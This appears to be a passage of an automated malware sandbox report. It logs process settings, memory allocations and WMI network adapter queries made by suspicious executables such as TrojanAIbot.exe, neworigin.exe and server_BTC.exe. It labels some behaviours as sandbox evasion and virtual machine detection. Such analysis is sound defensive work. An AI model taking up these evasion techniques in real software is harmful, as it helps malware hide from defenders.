Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F20000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F21000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F4D000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F4E000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2FA4000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 309C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 309E000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2E40000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2E41000 memory commit 500178944	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2E6D000 memory commit 500002816	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2E6E000 memory commit 500350976	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2EC4000 memory commit 501014528	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2FBC000 memory commit 500006912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2FBE000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2EE0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2EE1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F0D000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F0E000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 2F64000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 305C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: 305E000 memory commit 500015104

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 1210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 4D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 4360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 1470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 3230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 17D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: AF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 4780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 1160000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 1470000 memory reserve \| memory write watch
